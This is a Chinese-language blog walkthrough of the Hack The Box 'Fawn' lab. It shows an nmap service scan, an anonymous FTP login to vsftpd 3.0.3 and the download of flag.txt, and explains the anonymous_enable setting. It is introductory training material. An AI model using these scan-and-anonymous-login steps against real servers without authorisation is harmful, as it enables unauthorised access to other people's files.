RedMaple

Fawn — HTB Walkthrough

筆記種類
HTB Lab 
取得ip後先掃port


┌──(kali㉿kali)-[~]
└─$ nmap -sV -oA initial_nmap_scan 10.129.150.23
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-12 12:34 EDT
Nmap scan report for 10.129.150.23
Host is up (1.0s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.78 seconds

因此我們看到連接埠21/tcp處於開放狀態。此連接埠正在執行ftp服務,我們記下此服務的版本,即vsftpd 3.0.3。 FTP(檔案傳輸協定是一種用於在兩個裝置之間傳輸檔案的協定。它基於客戶端-伺服器模型,其中客戶端通常是請求文件的設備,而伺服器提供文件。預設情況下,FTP是一種不安全的協議,因為資料以純文字形式發送。我們看到該主機很可能正在執行基於 Unix 的作業系統OS)。

 

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.150.23
Connected to 10.129.150.23.
220 (vsFTPd 3.0.3)
Name (10.129.150.23:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||18763|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.

 

anonymous🔑 您看到登入的原因

  1. 預設啟用匿名 FTP
    許多 FTP 伺服器(包括 vsFTPd)允許匿名登入帳戶進行公共存取。

    • 這使用使用者名稱anonymous(或ftp)並通常要求輸入電子郵件地址作為密碼。

    • 該帳戶會對應到具有非常有限權限的系統使用者(通常是/home/ftp或)。/var/ftp

  2. 伺服器配置(vsftpd.conf
    行為由下列因素控制:

    
 
     
    anonymous_enable=YES local_enable=NO

    • 如果anonymous_enable=YES,伺服器始終提供匿名登入

    • 如果local_enable=NO,普通系統使用者無法登錄,因此只有anonymous可用。

  3. 安全性和遺留相容性

    • 從歷史上看,匿名 FTP 用於共享檔案(如驅動程式、公共資料集)。

    • 出於現代安全原因,許多管理員會停用它,但 vsFTPd 中的預設範例配置通常會保持啟用狀態。

  4. 客戶端行為
    如果您只輸入:

    
 
     
    ftp <server>

    如果您未指定使用者名,客戶端可能會自動嘗試anonymous
    。要以特定用戶身份登錄,您需要:

    ftp <server> Name (<server>:youruser): myusername

 

ftp> ls
229 Entering Extended Passive Mode (|||49864|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||7229|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |********************************|    32        5.98 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.03 KiB/s)
ftp> bye
221 Goodbye.

 

 

Visit the link for more information:
References